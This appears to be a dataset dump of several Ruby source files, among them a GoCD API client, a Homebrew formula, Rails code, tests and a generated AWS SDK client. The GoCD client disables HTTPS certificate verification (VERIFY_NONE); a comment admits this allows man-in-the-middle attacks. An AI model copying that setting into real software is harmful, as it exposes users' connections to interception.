hexsha (stringlengths 40-40) | size (int64 2-1.01M) | content (stringlengths 2-1.01M) | avg_line_length (float64 1.5-100) | max_line_length (int64 2-1k) | alphanum_fraction (float64 0.25-1)
---|---|---|---|---|---
87f369bb819421cd54d6c63b07a37eae57167dd3 | 1,732 |
lib = File.expand_path("../lib", __FILE__)
$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
require "vue_gen/version"
Gem::Specification.new do |spec|
spec.name = "vue_gen"
spec.version = VueGen::VERSION
spec.authors = ["ou.yun"]
spec.email = ["[email protected]"]
spec.summary = %q{Write a short summary, because RubyGems requires one.}
spec.description = %q{Write a longer description or delete this line.}
spec.homepage = "https://github.com/ouin-tci"
spec.license = "MIT"
# Prevent pushing this gem to RubyGems.org. To allow pushes either set the 'allowed_push_host'
# to allow pushing to a single host or delete this section to allow pushing to any host.
if spec.respond_to?(:metadata)
spec.metadata["allowed_push_host"] = "Set to 'http://mygemserver.com'"
spec.metadata["homepage_uri"] = spec.homepage
spec.metadata["source_code_uri"] = "Put your gem's public repo URL here."
spec.metadata["changelog_uri"] = "Put your gem's CHANGELOG.md URL here."
else
raise "RubyGems 2.0 or newer is required to protect against " \
"public gem pushes."
end
# Specify which files should be added to the gem when it is released.
# The `git ls-files -z` loads the files in the RubyGem that have been added into git.
spec.files = Dir.chdir(File.expand_path('..', __FILE__)) do
`git ls-files -z`.split("\x0").reject { |f| f.match(%r{^(test|spec|features)/}) }
end
spec.bindir = "exe"
spec.executables = spec.files.grep(%r{^exe/}) { |f| File.basename(f) }
spec.require_paths = ["lib"]
spec.add_development_dependency "bundler", "~> 2.0"
spec.add_development_dependency "rake", "~> 10.0"
end
| 41.238095 | 96 | 0.669169 |
acaa4d334775caf4861f80245b0a386ea1b3aeb3 | 6,623 | require 'net/http'
require 'json'
require 'openssl'
module GocdClient
class Service
attr_reader :url
def initialize(url, username, password)
@url = url
@username = username
@password = password
end
############### Server Health ###############
def healthcheck
if version >= '17.11.0'
healthcheck_json = get('/go/api/v1/health', {"Accept" => "application/vnd.go.cd.v1+json"}).body
JSON.parse(healthcheck_json)
else
raise NotImplementedError.new
end
end
############### Agents #####################
def agents
if version >= '15.2.0'
agents_json = JSON.parse(get('/go/api/agents', {"Accept" => "application/vnd.go.cd.v4+json"}).body)
agents_json['_embedded']['agents'].map do |agent_json|
Models::Agent.new(agent_json)
end
else
raise NotImplementedError.new
end
end
def agent(uuid)
if version >= '15.2.0'
agent_json = JSON.parse(get("/go/api/agents/#{uuid}", {"Accept" => "application/vnd.go.cd.v4+json"}).body)
Models::Agent.new(agent_json)
else
raise NotImplementedError.new
end
end
############### Agent Health ###############
############### Users ######################
############### Current User ###############
############### Notification Filters #######
############### Materials ##################
############### Backups ####################
############### Pipeline Groups ############
############### Artifacts ##################
def artifacts(pipeline_name, pipeline_counter, stage_name, stage_counter, job_name)
if version > '14.3.0'
JSON.parse(get("/go/files/#{pipeline_name}/#{pipeline_counter}/#{stage_name}/#{stage_counter}/#{job_name}.json", {'Accept' => 'application/json'}).body)
else
raise NotImplementedError.new
end
end
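# Streams the artifact at source_path produced by the given job run into a local file at destination.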
def artifact_download(pipeline_name, pipeline_counter, stage_name, stage_counter, job_name, source_path, destination)
endpoint = File.join("/go/files/#{pipeline_name}/#{pipeline_counter}/#{stage_name}/#{stage_counter}/#{job_name}", source_path)
connect do |http|
request = Net::HTTP::Get.new(endpoint)
request.basic_auth(@username, @password)
http.request(request) do |response|
File.open(destination, 'wb') do |io|
response.read_body do |chunk|
io.write(chunk)
end
end
end
end
end
############### Pipelines ##################
def pipeline(pipeline_name, pipeline_counter)
pipeline_json = get("/go/api/pipelines/#{pipeline_name}/instance/#{pipeline_counter}", {'Accept' => "application/json"}).body
Models::Pipeline.new(JSON.parse(pipeline_json))
end
def pipeline_history(pipeline_name, offset=0)
history_json = get("/go/api/pipelines/#{pipeline_name}/history/#{offset}", {'Accept' => "application/json"}).body
Models::PipelineHistory.new(JSON.parse(history_json))
end
############### Stages #####################
def stage(pipeline_name, stage_name, pipeline_counter, stage_counter)
stage_json = get("/go/api/stages/#{pipeline_name}/#{stage_name}/instance/#{pipeline_counter}/#{stage_counter}").body
Models::Stage.new(JSON.parse(stage_json))
end
############### Version ####################
def version
@version ||= Models::Version.new(JSON.parse(get('/go/api/version', {"Accept" => "application/vnd.go.cd.v1+json"}).body))
end
############### Extension ##################
#fetch_artifact('CP-GenerateCashReportJob/TestJobDeploy-UAT/TestJobDeploy-STG', 'buildTestPackage', 'buildTestPackage', 'GenerateCashReport-linux-x64.tar.gz', '/tmp/GenerateCashReport-linux-x64-4.tar.gz')
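# Walks the pipeline dependency chain named by pipeline_path (most upstream pipeline first, most
# downstream pipeline last): starting from the latest fully passed run of the last pipeline in the
# path, it follows pipeline material revisions back to the first pipeline, then downloads
# source_path produced by job_name in stage_name of that upstream run.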
def fetch_artifact(pipeline_path, stage_name, job_name, source_path, destination)
pipeline_names_descending = pipeline_path.split('/').reverse
#get parent pipeline
parent_pipeline_name = pipeline_names_descending.shift
parent_pipeline = pipeline_latest_passed(parent_pipeline_name)
parent_pipeline_counter = parent_pipeline.counter
parent_stage_name = nil
parent_stage_counter = nil
pipeline_names_descending.each do |pipeline_name|
material_revision = parent_pipeline.build_cause['material_revisions'].detect do |_material_revision|
_material_revision['material']['type'] == 'Pipeline' && _material_revision['material']['description'] == pipeline_name
end
revision = material_revision['modifications'].first['revision']
parent_pipeline_name, parent_pipeline_counter, parent_stage_name, parent_stage_counter = revision.split('/')
parent_pipeline = pipeline(parent_pipeline_name, parent_pipeline_counter)
end
parent_pipeline_stage = parent_pipeline.stages.detect {|stage| stage.name == stage_name}
parent_pipeline_counter = parent_pipeline.counter
parent_stage_name = parent_pipeline_stage.name
parent_stage_counter = parent_pipeline_stage.counter
artifact_download(parent_pipeline_name, parent_pipeline_counter, parent_stage_name, parent_stage_counter, job_name, source_path, destination)
end
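# Pages through the pipeline's history ten records at a time and returns the most recent run
# whose stages have all passed, or nil if none is found.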
def pipeline_latest_passed(pipeline_name)
offset = 0
found = nil
until found do
history = pipeline_history(pipeline_name, offset)
break if history.pipelines.empty?
pipeline_descending = history.pipelines.sort_by(&:counter).reverse
pipeline_descending.each do |pipeline|
if pipeline.stages.all?(&:passed?)
found = pipeline
break
end
end
offset += 10
end
found
end
############### Private ##################
private
def get(endpoint, headers={})
connect do |http|
request = Net::HTTP::Get.new(endpoint, headers)
request.basic_auth(@username, @password)
http.request(request)
end
end
def connect
http = get_http(@url)
response = yield(http)
if response.code.match(/2\d{2}/)
response
else
raise("Error response code #{response.code}")
end
end
def get_http(url)
uri = URI.parse(url)
http = Net::HTTP.new(uri.host, uri.port)
if uri.kind_of?(URI::HTTPS)
http.use_ssl = true
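# NOTE: certificate verification is disabled below, so HTTPS connections are open to
# man-in-the-middle attacks; acceptable only for trusted internal servers with self-signed certificates.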
http.verify_mode = OpenSSL::SSL::VERIFY_NONE
else
http.use_ssl = false
end
http.read_timeout = @read_timeout if @read_timeout # keep Net::HTTP's default timeout when no value was supplied
http
end
end
end
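# Usage sketch (not part of the library): shows how the Service class above might be driven.
# The server URL, credentials, pipeline, stage, and job names below are placeholders, and the
# Models::* classes referenced by Service are assumed to be loaded elsewhere in the gem.
if $PROGRAM_NAME == __FILE__
  service = GocdClient::Service.new('https://gocd.example.com', 'user', 'secret')

  # Report overall server health (requires GoCD >= 17.11.0).
  puts service.healthcheck.inspect

  # Find the newest fully green run of a pipeline and download one of its artifacts.
  passed = service.pipeline_latest_passed('example-pipeline')
  if passed
    service.artifact_download('example-pipeline', passed.counter, 'build', '1',
                              'build-job', 'dist/app.tar.gz', '/tmp/app.tar.gz')
  end
end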
| 31.995169 | 208 | 0.608637 |
abfdacdf34247ad770dd737db26d150413feb559 | 115 | module SafeCredentials
class Engine < Rails::Engine
initializer "loading configuration" do
end
end
end | 16.428571 | 42 | 0.73913 |
ac8c6758e5fc15b3d27ceaf712679b2cbc0aed85 | 3,936 | class Ykman < Formula
include Language::Python::Virtualenv
desc "Tool for managing your YubiKey configuration"
homepage "https://developers.yubico.com/yubikey-manager/"
url "https://developers.yubico.com/yubikey-manager/Releases/yubikey-manager-1.0.1.tar.gz"
sha256 "1f915d8899dbcf85b6b9879f5664953ce1edcd5a503a00d03b9c6298900bfc44"
head "https://github.com/Yubico/yubikey-manager.git"
bottle do
cellar :any
sha256 "d0f7bb3507e7c4f14a8d125e189a3789a7eb2b7febd0965699449b3596dfa75e" => :mojave
sha256 "69fba1dbbe9208d29eb6cdc77aa3d4e34cb617e6d1975e9893d55e856581c6ed" => :high_sierra
sha256 "a4c492c37bec49144c5d93575d0822f3702a91f4316d1bcbe770e71510c9a97c" => :sierra
end
depends_on "swig" => :build
depends_on "libusb"
depends_on "openssl"
depends_on "python"
depends_on "ykpers"
resource "asn1crypto" do
url "https://files.pythonhosted.org/packages/fc/f1/8db7daa71f414ddabfa056c4ef792e1461ff655c2ae2928a2b675bfed6b4/asn1crypto-0.24.0.tar.gz"
sha256 "9d5c20441baf0cb60a4ac34cc447c6c189024b6b4c6cd7877034f4965c464e49"
end
resource "cffi" do
url "https://files.pythonhosted.org/packages/e7/a7/4cd50e57cc6f436f1cc3a7e8fa700ff9b8b4d471620629074913e3735fb2/cffi-1.11.5.tar.gz"
sha256 "e90f17980e6ab0f3c2f3730e56d1fe9bcba1891eeea58966e89d352492cc74f4"
end
resource "click" do
url "https://files.pythonhosted.org/packages/95/d9/c3336b6b5711c3ab9d1d3a80f1a3e2afeb9d8c02a7166462f6cc96570897/click-6.7.tar.gz"
sha256 "f15516df478d5a56180fbf80e68f206010e6d160fc39fa508b65e035fd75130b"
end
resource "cryptography" do
url "https://files.pythonhosted.org/packages/22/21/233e38f74188db94e8451ef6385754a98f3cad9b59bedf3a8e8b14988be4/cryptography-2.3.1.tar.gz"
sha256 "8d10113ca826a4c29d5b85b2c4e045ffa8bad74fb525ee0eceb1d38d4c70dfd6"
end
resource "fido2" do
url "https://files.pythonhosted.org/packages/58/0d/655ef526ab14b8eecc70f773294f15b23402d5184da290c4f23d5d893048/fido2-0.4.0.tar.gz"
sha256 "f8d84aef5b54cccfb5558f399f196d540f8dcba458862214c14f7f66c22a4488"
end
resource "idna" do
url "https://files.pythonhosted.org/packages/65/c4/80f97e9c9628f3cac9b98bfca0402ede54e0563b56482e3e6e45c43c4935/idna-2.7.tar.gz"
sha256 "684a38a6f903c1d71d6d5fac066b58d7768af4de2b832e426ec79c30daa94a16"
end
resource "ipaddress" do
url "https://files.pythonhosted.org/packages/97/8d/77b8cedcfbf93676148518036c6b1ce7f8e14bf07e95d7fd4ddcb8cc052f/ipaddress-1.0.22.tar.gz"
sha256 "b146c751ea45cad6188dd6cf2d9b757f6f4f8d6ffb96a023e6f2e26eea02a72c"
end
resource "pycparser" do
url "https://files.pythonhosted.org/packages/68/9e/49196946aee219aead1290e00d1e7fdeab8567783e83e1b9ab5585e6206a/pycparser-2.19.tar.gz"
sha256 "a988718abfad80b6b157acce7bf130a30876d27603738ac39f140993246b25b3"
end
resource "pyOpenSSL" do
url "https://files.pythonhosted.org/packages/9b/7c/ee600b2a9304d260d96044ab5c5e57aa489755b92bbeb4c0803f9504f480/pyOpenSSL-18.0.0.tar.gz"
sha256 "6488f1423b00f73b7ad5167885312bb0ce410d3312eb212393795b53c8caa580"
end
resource "pyscard" do
url "https://files.pythonhosted.org/packages/17/f3/e6e52e3dab39b26450d9fb6385c4a40f883180d6f1ee26ad4567dd243edc/pyscard-1.9.7.tar.gz"
sha256 "412c74c83e7401566e9d3d7b8b5ca965e74582a1f33179b3c1fabf1da73ebf80"
end
resource "pyusb" do
url "https://files.pythonhosted.org/packages/5f/34/2095e821c01225377dda4ebdbd53d8316d6abb243c9bee43d3888fa91dd6/pyusb-1.0.2.tar.gz"
sha256 "4e9b72cc4a4205ca64fbf1f3fff39a335512166c151ad103e55c8223ac147362"
end
resource "six" do
url "https://files.pythonhosted.org/packages/16/d8/bc6316cf98419719bd59c91742194c111b6f2e85abac88e496adefaf7afe/six-1.11.0.tar.gz"
sha256 "70e8a77beed4562e7f14fe23a786b54f6296e34344c23bc42f07b15018ff98e9"
end
def install
virtualenv_install_with_resources
end
test do
assert_match version.to_s, shell_output("#{bin}/ykman --version")
end
end
| 43.252747 | 142 | 0.818852 |
ab1505910d96224affd18d3bc516cfc713bf59d1 | 37 | require 'sensu-plugins-chef/version'
| 18.5 | 36 | 0.810811 |
e92fe8ae738b244a5d9f4c7b07f980778612d309 | 2,525 | module Core
class OrganizationsController < Core::ApplicationController
respond_to :json
before_action :filter_blocked_users, except: :index
def index
@organizations = Organization.finder(params[:q])
json = {
records: @organizations.page(params[:page]).per(params[:per]),
total: @organizations.count
}
respond_with(json)
end
def show
@organization = Organization.find(params[:id])
respond_with({ id: @organization.id, text: @organization.name })
end
def new
@organization = Organization.new
@employment = @organization.employments.new
end
def create
@organization = Organization.new(organization_params)
@employment = @organization.employments.new(employment_params)
@employment.user = current_user
new_city = params[:organization][:city_title].to_s
if new_city.present? && @organization.country
@organization.city_title = new_city
@organization.city.save!
@organization.city.create_ticket(current_user) if @organization.city.previous_changes['id']
end
if @organization.save
@organization.create_ticket(current_user)
if @organization.kind.departments_required?
redirect_to [:edit, @organization], notice: t("flash.you_have_to_fill_departments")
else
@organization.departments.create!(name: @organization.short_name)
redirect_to @employment
end
else
render :new
end
end
def edit
@organization = Organization.find(params[:id])
can_edit
end
def update
@organization = Organization.find(params[:id])
can_edit
if @organization.update(organization_params)
@organization.departments.each do |d|
d.create_ticket(current_user) if d.previous_changes['id']
end
redirect_to main_app.profile_path
else
render :edit
end
end
private
def can_edit
raise MayMay::Unauthorized unless @organization.can_edit?(current_user)
# redirect_to(main_app.profile_path)
end
def employment_params
params.require(:employment).permit(:primary)
end
def organization_params
params.require(:organization).permit(:name, :abbreviation, :country_id,
:city_title, :city_id, :kind_id, :_destroy,
departments_attributes: [ :id, :_destroy, :name ])
end
end
end
| 29.022989 | 99 | 0.646337 |
f719a95987153995fa81c3e750932edb4233efb6 | 6,262 | # frozen_string_literal: true
require "test_helper"
require "tmpdir"
if Licensed::Shell.tool_available?("go")
describe Licensed::Source::Go do
let(:gopath) { File.expand_path("../../fixtures/go", __FILE__) }
let(:fixtures) { File.join(gopath, "src/test") }
let(:config) { Licensed::Configuration.new("go" => { "GOPATH" => gopath }) }
let(:source) { Licensed::Source::Go.new(config) }
describe "enabled?" do
it "is true if go source is available" do
Dir.chdir(fixtures) do
assert source.enabled?
end
end
it "is false if go source is not available" do
Dir.mktmpdir do |dir|
Dir.chdir(dir) do
refute source.enabled?
end
end
end
end
describe "gopath" do
it "works with an absolute configuration path" do
assert_equal gopath, source.gopath
end
it "works with a configuration path relative to repository root" do
config["go"]["GOPATH"] = "test/fixtures/go"
assert_equal gopath, source.gopath
end
it "works with an expandable configuration path" do
config["go"]["GOPATH"] = "~"
assert_equal File.expand_path("~"), source.gopath
end
it "uses ENV['GOPATH'] if not set in configuration" do
begin
original_gopath = ENV["GOPATH"]
ENV["GOPATH"] = gopath
config.delete("go")
assert_equal gopath, source.gopath
# sanity test that finding dependencies using ENV works
Dir.chdir fixtures do
assert source.dependencies.detect { |d| d["name"] == "github.com/hashicorp/golang-lru" }
end
ensure
ENV["GOPATH"] = original_gopath
end
end
end
describe "dependencies" do
it "does not include the current package" do
Dir.chdir fixtures do
dep = source.dependencies.detect { |d| d["name"].end_with?("test") }
refute dep
end
end
it "includes direct dependencies" do
Dir.chdir fixtures do
dep = source.dependencies.detect { |d| d["name"] == "github.com/hashicorp/golang-lru" }
assert dep
assert_equal "go", dep["type"]
assert dep["homepage"]
assert dep["summary"]
end
end
it "includes indirect dependencies" do
Dir.chdir fixtures do
dep = source.dependencies.detect { |d| d["name"] == "github.com/hashicorp/golang-lru/simplelru" }
assert dep
assert_equal "go", dep["type"]
assert dep["homepage"]
end
end
it "doesn't include dependencies from the go std library" do
Dir.chdir fixtures do
refute source.dependencies.any? { |d| d["name"] == "runtime" }
end
end
it "doesn't include vendored dependencies from the go std library" do
Dir.chdir fixtures do
refute source.dependencies.any? { |d| d["name"] == "golang.org/x/net/http2/hpack" }
end
end
describe "with unavailable packages" do
# use a custom go path that doesn't contain go libraries installed from
# setup scripts
let(:gopath) { Dir.mktmpdir }
before do
# fixtures now points at the tmp location, copy go source to tmp
# fixtures location
FileUtils.mkdir_p File.join(gopath, "src")
FileUtils.cp_r File.expand_path("../../fixtures/go/src/test", __FILE__), fixtures
# the tests are expected to print errors from `go list` which
# should not be hidden during normal usage. hide that output during
# the test execution
@previous_stderr = $stderr
$stderr.reopen(File.new("/dev/null", "w"))
end
after do
$stderr.reopen(@previous_stderr)
FileUtils.rm_rf gopath
end
it "do not raise an error if ignored" do
config.ignore("type" => "go", "name" => "github.com/hashicorp/golang-lru")
Dir.chdir fixtures do
source.dependencies
end
end
it "raises an error" do
Dir.chdir fixtures do
assert_raises RuntimeError do
source.dependencies
end
end
end
end
describe "search root" do
it "is set to the vendor path for vendored packages" do
Dir.chdir fixtures do
dep = source.dependencies.detect { |d| d["name"] == "github.com/gorilla/context" }
assert dep
assert_equal File.join(fixtures, "vendor"), dep.search_root
end
end
it "is set to #gopath" do
Dir.chdir fixtures do
dep = source.dependencies.detect { |d| d["name"] == "github.com/hashicorp/golang-lru" }
assert dep
assert_equal gopath, dep.search_root
end
end
end
describe "package version" do
describe "with go module information" do
let(:fixtures) { File.join(gopath, "src/modules_test") }
it "is the module version" do
skip unless source.go_version >= Gem::Version.new("1.11.0")
begin
ENV["GO111MODULE"] = "on"
Dir.chdir fixtures do
dep = source.dependencies.detect { |d| d["name"] == "github.com/gorilla/context" }
assert_equal "v1.1.1", dep["version"]
end
ensure
ENV["GO111MODULE"] = nil
end
end
end
describe "without go module information" do
it "is nil when git is unavailable" do
Dir.chdir fixtures do
Licensed::Git.stub(:available?, false) do
dep = source.dependencies.detect { |d| d["name"] == "github.com/gorilla/context" }
assert_nil dep["version"]
end
end
end
it "is the latest git SHA of the package directory" do
Dir.chdir fixtures do
dep = source.dependencies.detect { |d| d["name"] == "github.com/gorilla/context" }
assert_match(/[a-f0-9]{40}/, dep["version"])
end
end
end
end
end
end
end
| 31.626263 | 107 | 0.565474 |
abf51c4c05d0904222773a53636a8cac2e65d797 | 1,364 | # encoding: UTF-8
require 'spec_helper'
describe "show-model" do
it "should print one ActiveRecord model" do
output = mock_pry('show-model Beer', 'exit-all')
expected = <<MODEL
Beer
id: integer
name: string
type: string
rating: integer
ibu: integer
abv: integer
belongs_to :hacker
MODEL
output.must_equal expected
end
if defined? Mongoid
it "should print one Mongoid model" do
output = mock_pry('show-model Artist', 'exit-all')
expected = <<MODEL
Artist
_id: BSON::ObjectId
name: String
embeds_one :beer (validate)
embeds_many :instruments (validate)
MODEL
output.gsub!(/^ *_type: String\n/, '') # mongoid 3.0 and 3.1 differ on this
output.gsub!(/Moped::BSON/, 'BSON') # mongoid 3 and 4 differ on this
output.must_equal expected
end
end
it "should print an error if the model doesn't exist" do
output = mock_pry('show-model FloojBulb', 'exit-all')
output.must_equal "Couldn't find model FloojBulb!\n"
end
it "should print an error if it doesn't know what to do with the model" do
output = mock_pry('show-model PryRails', 'exit-all')
output.must_equal "Don't know how to show PryRails!\n"
end
it "should print help if no model name is given" do
output = mock_pry('show-model', 'exit-all')
output.must_match(/Usage: show-model/)
end
end
| 24.357143 | 81 | 0.677419 |
e2db0e0d46cf4c1639497fac1d3a2f1cea4467a3 | 1,584 | require_relative 'form_request'
require 'open-uri'
require 'hashie'
Hash.send :include, Hashie::Extensions
module ResponsesApi
class RetrieveResponsesRequest < FormRequest
ISO_8601_FORMAT = '%Y-%m-%dT%H:%M:%S'.freeze
def initialize(form_id, token: APIConfig.token, page_size: 25, page: nil, ts_since: nil, ts_until: nil, after: nil, before: nil, completed: true,
sort: nil, query: nil, fields: nil)
url = "#{APIConfig.api_request_url}/forms/#{form_id}/responses?"
url << "page_size=#{page_size}&" unless page_size.nil?
url << "page=#{page}&" unless page.nil?
url << "since=#{ts_since.utc.strftime(ISO_8601_FORMAT)}&" unless ts_since.nil?
url << "until=#{ts_until.utc.strftime(ISO_8601_FORMAT)}&" unless ts_until.nil?
url << "after=#{after}&" unless after.nil?
url << "before=#{before}&" unless before.nil?
url << "completed=#{completed}&" unless completed.nil?
url << "sort=#{sort}&" unless sort.nil?
url << "query=#{query}&" unless query.nil?
url << "fields=#{fields}&" unless fields.nil?
r = {
method: :get,
url: url
}
r[:headers] = { 'Authorization' => "Bearer #{token}" } unless token.nil?
request(r)
end
def success?
@response.code == 200 && json?
end
def responses(hashie: true)
if hashie
Hashie::Mash.new(json).items
else
json.fetch(:items)
end
end
def page_count
json.fetch(:page_count)
end
def total_items
json.fetch(:total_items)
end
end
end
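# Usage sketch (not part of the library): the form ID and token below are placeholders, and
# FormRequest plus APIConfig from the surrounding gem are assumed to be loaded already.
if $PROGRAM_NAME == __FILE__
  request = ResponsesApi::RetrieveResponsesRequest.new('FORM_ID', token: 'ACCESS_TOKEN',
                                                       page_size: 10, completed: true)
  if request.success?
    puts "#{request.total_items} responses across #{request.page_count} page(s)"
    request.responses.each { |item| puts item.inspect }
  end
end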
| 29.886792 | 149 | 0.612374 |
6a5a90847460284587dd16dbf304b5075a36942f | 334 | class AddEditableToSysEditors < ActiveRecord::Migration
def up
add_reference :sys_editors, :editable, index: true, polymorphic: true
GpArticle::Doc.find_each {|d| d.editors << Sys::Editor.find_by(parent_unid: d.unid) }
end
def down
remove_reference :sys_editors, :editable, index: true, polymorphic: true
end
end
| 30.363636 | 89 | 0.739521 |
e84fc658f967b8b51cb385ce8a1d83e123958609 | 92,358 | # frozen_string_literal: true
# WARNING ABOUT GENERATED CODE
#
# This file is generated. See the contributing guide for more information:
# https://github.com/aws/aws-sdk-ruby/blob/version-3/CONTRIBUTING.md
#
# WARNING ABOUT GENERATED CODE
require 'seahorse/client/plugins/content_length.rb'
require 'aws-sdk-core/plugins/credentials_configuration.rb'
require 'aws-sdk-core/plugins/logging.rb'
require 'aws-sdk-core/plugins/param_converter.rb'
require 'aws-sdk-core/plugins/param_validator.rb'
require 'aws-sdk-core/plugins/user_agent.rb'
require 'aws-sdk-core/plugins/helpful_socket_errors.rb'
require 'aws-sdk-core/plugins/retry_errors.rb'
require 'aws-sdk-core/plugins/global_configuration.rb'
require 'aws-sdk-core/plugins/regional_endpoint.rb'
require 'aws-sdk-core/plugins/endpoint_discovery.rb'
require 'aws-sdk-core/plugins/endpoint_pattern.rb'
require 'aws-sdk-core/plugins/response_paging.rb'
require 'aws-sdk-core/plugins/stub_responses.rb'
require 'aws-sdk-core/plugins/idempotency_token.rb'
require 'aws-sdk-core/plugins/jsonvalue_converter.rb'
require 'aws-sdk-core/plugins/client_metrics_plugin.rb'
require 'aws-sdk-core/plugins/client_metrics_send_plugin.rb'
require 'aws-sdk-core/plugins/transfer_encoding.rb'
require 'aws-sdk-core/plugins/http_checksum.rb'
require 'aws-sdk-core/plugins/checksum_algorithm.rb'
require 'aws-sdk-core/plugins/defaults_mode.rb'
require 'aws-sdk-core/plugins/recursion_detection.rb'
require 'aws-sdk-core/plugins/signature_v4.rb'
require 'aws-sdk-core/plugins/protocols/rest_json.rb'
Aws::Plugins::GlobalConfiguration.add_identifier(:iottwinmaker)
module Aws::IoTTwinMaker
# An API client for IoTTwinMaker. To construct a client, you need to configure a `:region` and `:credentials`.
#
# client = Aws::IoTTwinMaker::Client.new(
# region: region_name,
# credentials: credentials,
# # ...
# )
#
# For details on configuring region and credentials see
# the [developer guide](/sdk-for-ruby/v3/developer-guide/setup-config.html).
#
# See {#initialize} for a full list of supported configuration options.
class Client < Seahorse::Client::Base
include Aws::ClientStubs
@identifier = :iottwinmaker
set_api(ClientApi::API)
add_plugin(Seahorse::Client::Plugins::ContentLength)
add_plugin(Aws::Plugins::CredentialsConfiguration)
add_plugin(Aws::Plugins::Logging)
add_plugin(Aws::Plugins::ParamConverter)
add_plugin(Aws::Plugins::ParamValidator)
add_plugin(Aws::Plugins::UserAgent)
add_plugin(Aws::Plugins::HelpfulSocketErrors)
add_plugin(Aws::Plugins::RetryErrors)
add_plugin(Aws::Plugins::GlobalConfiguration)
add_plugin(Aws::Plugins::RegionalEndpoint)
add_plugin(Aws::Plugins::EndpointDiscovery)
add_plugin(Aws::Plugins::EndpointPattern)
add_plugin(Aws::Plugins::ResponsePaging)
add_plugin(Aws::Plugins::StubResponses)
add_plugin(Aws::Plugins::IdempotencyToken)
add_plugin(Aws::Plugins::JsonvalueConverter)
add_plugin(Aws::Plugins::ClientMetricsPlugin)
add_plugin(Aws::Plugins::ClientMetricsSendPlugin)
add_plugin(Aws::Plugins::TransferEncoding)
add_plugin(Aws::Plugins::HttpChecksum)
add_plugin(Aws::Plugins::ChecksumAlgorithm)
add_plugin(Aws::Plugins::DefaultsMode)
add_plugin(Aws::Plugins::RecursionDetection)
add_plugin(Aws::Plugins::SignatureV4)
add_plugin(Aws::Plugins::Protocols::RestJson)
# @overload initialize(options)
# @param [Hash] options
# @option options [required, Aws::CredentialProvider] :credentials
# Your AWS credentials. This can be an instance of any one of the
# following classes:
#
# * `Aws::Credentials` - Used for configuring static, non-refreshing
# credentials.
#
# * `Aws::SharedCredentials` - Used for loading static credentials from a
# shared file, such as `~/.aws/config`.
#
# * `Aws::AssumeRoleCredentials` - Used when you need to assume a role.
#
# * `Aws::AssumeRoleWebIdentityCredentials` - Used when you need to
# assume a role after providing credentials via the web.
#
# * `Aws::SSOCredentials` - Used for loading credentials from AWS SSO using an
# access token generated from `aws login`.
#
# * `Aws::ProcessCredentials` - Used for loading credentials from a
# process that outputs to stdout.
#
# * `Aws::InstanceProfileCredentials` - Used for loading credentials
# from an EC2 IMDS on an EC2 instance.
#
# * `Aws::ECSCredentials` - Used for loading credentials from
# instances running in ECS.
#
# * `Aws::CognitoIdentityCredentials` - Used for loading credentials
# from the Cognito Identity service.
#
# When `:credentials` are not configured directly, the following
# locations will be searched for credentials:
#
# * `Aws.config[:credentials]`
# * The `:access_key_id`, `:secret_access_key`, and `:session_token` options.
# * ENV['AWS_ACCESS_KEY_ID'], ENV['AWS_SECRET_ACCESS_KEY']
# * `~/.aws/credentials`
# * `~/.aws/config`
# * EC2/ECS IMDS instance profile - When used by default, the timeouts
# are very aggressive. Construct and pass an instance of
# `Aws::InstanceProfileCredentials` or `Aws::ECSCredentials` to
# enable retries and extended timeouts. Instance profile credential
# fetching can be disabled by setting ENV['AWS_EC2_METADATA_DISABLED']
# to true.
#
# @option options [required, String] :region
# The AWS region to connect to. The configured `:region` is
# used to determine the service `:endpoint`. When not passed,
# a default `:region` is searched for in the following locations:
#
# * `Aws.config[:region]`
# * `ENV['AWS_REGION']`
# * `ENV['AMAZON_REGION']`
# * `ENV['AWS_DEFAULT_REGION']`
# * `~/.aws/credentials`
# * `~/.aws/config`
#
# @option options [String] :access_key_id
#
# @option options [Boolean] :active_endpoint_cache (false)
# When set to `true`, a thread polling for endpoints will be running in
# the background every 60 secs (default). Defaults to `false`.
#
# @option options [Boolean] :adaptive_retry_wait_to_fill (true)
# Used only in `adaptive` retry mode. When true, the request will sleep
# until there is sufficient client side capacity to retry the request.
# When false, the request will raise a `RetryCapacityNotAvailableError` and will
# not retry instead of sleeping.
#
# @option options [Boolean] :client_side_monitoring (false)
# When `true`, client-side metrics will be collected for all API requests from
# this client.
#
# @option options [String] :client_side_monitoring_client_id ("")
# Allows you to provide an identifier for this client which will be attached to
# all generated client side metrics. Defaults to an empty string.
#
# @option options [String] :client_side_monitoring_host ("127.0.0.1")
# Allows you to specify the DNS hostname or IPv4 or IPv6 address that the client
# side monitoring agent is running on, where client metrics will be published via UDP.
#
# @option options [Integer] :client_side_monitoring_port (31000)
# Required for publishing client metrics. The port that the client side monitoring
# agent is running on, where client metrics will be published via UDP.
#
# @option options [Aws::ClientSideMonitoring::Publisher] :client_side_monitoring_publisher (Aws::ClientSideMonitoring::Publisher)
# Allows you to provide a custom client-side monitoring publisher class. By default,
# will use the Client Side Monitoring Agent Publisher.
#
# @option options [Boolean] :convert_params (true)
# When `true`, an attempt is made to coerce request parameters into
# the required types.
#
# @option options [Boolean] :correct_clock_skew (true)
# Used only in `standard` and adaptive retry modes. Specifies whether to apply
# a clock skew correction and retry requests with skewed client clocks.
#
# @option options [String] :defaults_mode ("legacy")
# See {Aws::DefaultsModeConfiguration} for a list of the
# accepted modes and the configuration defaults that are included.
#
# @option options [Boolean] :disable_host_prefix_injection (false)
# Set to true to disable SDK automatically adding host prefix
# to default service endpoint when available.
#
# @option options [String] :endpoint
# The client endpoint is normally constructed from the `:region`
# option. You should only configure an `:endpoint` when connecting
# to test or custom endpoints. This should be a valid HTTP(S) URI.
#
# @option options [Integer] :endpoint_cache_max_entries (1000)
# Used for the maximum size limit of the LRU cache storing endpoints data
# for endpoint discovery enabled operations. Defaults to 1000.
#
# @option options [Integer] :endpoint_cache_max_threads (10)
# Used for the maximum threads in use for polling endpoints to be cached, defaults to 10.
#
# @option options [Integer] :endpoint_cache_poll_interval (60)
# When :endpoint_discovery and :active_endpoint_cache is enabled,
# Use this option to config the time interval in seconds for making
# requests fetching endpoints information. Defaults to 60 sec.
#
# @option options [Boolean] :endpoint_discovery (false)
# When set to `true`, endpoint discovery will be enabled for operations when available.
#
# @option options [Aws::Log::Formatter] :log_formatter (Aws::Log::Formatter.default)
# The log formatter.
#
# @option options [Symbol] :log_level (:info)
# The log level to send messages to the `:logger` at.
#
# @option options [Logger] :logger
# The Logger instance to send log messages to. If this option
# is not set, logging will be disabled.
#
# @option options [Integer] :max_attempts (3)
# An integer representing the maximum number attempts that will be made for
